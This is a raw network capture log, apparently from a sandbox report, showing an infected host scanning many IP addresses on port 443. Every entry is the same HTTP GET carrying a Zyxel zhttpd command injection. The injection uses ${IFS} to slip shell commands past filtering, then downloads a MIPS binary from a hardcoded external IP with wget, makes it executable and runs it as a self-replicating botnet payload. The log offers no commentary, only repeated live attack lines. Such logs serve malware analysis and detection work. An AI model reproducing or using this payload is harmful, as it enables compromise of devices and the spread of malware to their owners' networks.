                                                Jan 12, 2024 18:16:24.479654074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4757192.168.2.235864688.172.1.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479695082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4758192.168.2.2358098172.161.202.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479720116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4759192.168.2.235753672.110.193.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479744911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4760192.168.2.234139618.55.77.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479772091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4761192.168.2.2356824193.76.243.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479825974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4762192.168.2.2333240211.160.138.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479860067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4763192.168.2.235041812.79.151.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479903936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4764192.168.2.2338936138.210.59.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479926109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4765192.168.2.235083264.34.246.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479988098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4766192.168.2.2352628181.19.156.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480015993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4767192.168.2.2350098105.45.229.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480056047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4768192.168.2.2332936186.126.75.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480082035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4769192.168.2.2337814193.141.243.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480115891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4770192.168.2.2337670187.129.170.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480168104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4771192.168.2.233931698.111.143.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480269909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4772192.168.2.2342422101.19.204.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480318069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4773192.168.2.235188247.20.22.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480354071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4774192.168.2.2336340195.146.100.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480401993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4775192.168.2.2355040126.152.37.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480429888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4776192.168.2.236029665.174.161.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480478048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4777192.168.2.2344722121.69.214.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480511904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4778192.168.2.233657237.239.199.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480554104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4779192.168.2.2349044121.113.168.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480607986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4780192.168.2.2346512200.217.60.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480650902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4781192.168.2.2354080190.41.41.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480696917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4782192.168.2.234073058.87.7.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480741024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4783192.168.2.2333114179.28.249.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480771065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4784192.168.2.233590252.34.41.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480818987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4785192.168.2.235351263.74.234.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480856895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4786192.168.2.235778049.23.172.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480897903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4787192.168.2.2342054155.104.48.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480938911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4788192.168.2.2353552217.112.191.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.480981112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4789192.168.2.2335690105.9.80.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481012106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4790192.168.2.2333814222.178.93.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481048107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4791192.168.2.234157831.148.45.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481069088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4792192.168.2.2344844160.141.134.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481148005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4793192.168.2.2352344188.74.188.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481178045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4794192.168.2.2353928141.40.167.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481230021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4795192.168.2.234295634.47.13.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481271982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4796192.168.2.235464249.33.96.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481323957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4797192.168.2.234127224.48.29.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481327057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4798192.168.2.2354496207.92.166.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481359005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4799192.168.2.234139242.20.130.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481412888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4800192.168.2.2352268175.97.182.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481422901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4801192.168.2.2339666117.150.71.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481477022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4802192.168.2.2358964143.216.56.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481509924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4803192.168.2.2337998129.239.123.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481549978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4804192.168.2.2341420117.251.120.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481581926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4805192.168.2.2355192200.160.236.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481618881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4806192.168.2.2352264132.189.247.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481661081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4807192.168.2.2349518140.26.82.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481683016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4808192.168.2.235784848.3.142.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481714964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4809192.168.2.2342494207.82.198.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481775045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4810192.168.2.235642479.42.54.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481817007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4811192.168.2.234513263.117.74.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481849909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4812192.168.2.2344328208.78.25.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481895924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4813192.168.2.235683280.59.130.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481909990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4814192.168.2.233754054.76.123.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.481987000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4815192.168.2.235929095.161.61.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482006073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4816192.168.2.234154890.122.254.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482053041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4817192.168.2.233555048.120.41.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482108116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4818192.168.2.2351678125.144.41.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.482125044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4819192.168.2.233335298.209.178.6443
                                                TimestampBytes transferredDirectionData
